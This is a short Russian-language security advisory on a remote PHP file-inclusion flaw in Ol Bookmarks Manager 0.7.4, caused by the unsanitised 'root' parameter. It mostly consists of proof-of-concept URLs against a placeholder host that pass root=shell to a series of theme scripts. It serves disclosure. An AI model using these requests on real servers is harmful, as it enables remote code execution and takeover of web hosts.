Программа: Ol Bookmarks Manager 0.7.4
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «root» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell
http://victime.com/path/themes/blackorange.php?root=shell
http://victime.com/path/theme/default.php?root=shell
http://victime.com/path/theme/frames1.php?root=shell
http://victime.com/path/theme/frames1_top.php?root=shell
http://victime.com/path/theme/test1.php?root=shell
http://victime.com/path/theme/test2.php?root=shell
http://victime.com/path/theme/test3.php?root=shell
http://victime.com/path/theme/test4.php?root=shell
http://victime.com/path/theme/test5.php?root=shell
http://victime.com/path/theme/test6.php?root=shell
http://victime.com/path/theme/frames1_left.php?root=shell
http://victime.com/path/theme/frames1_center.php?root=shell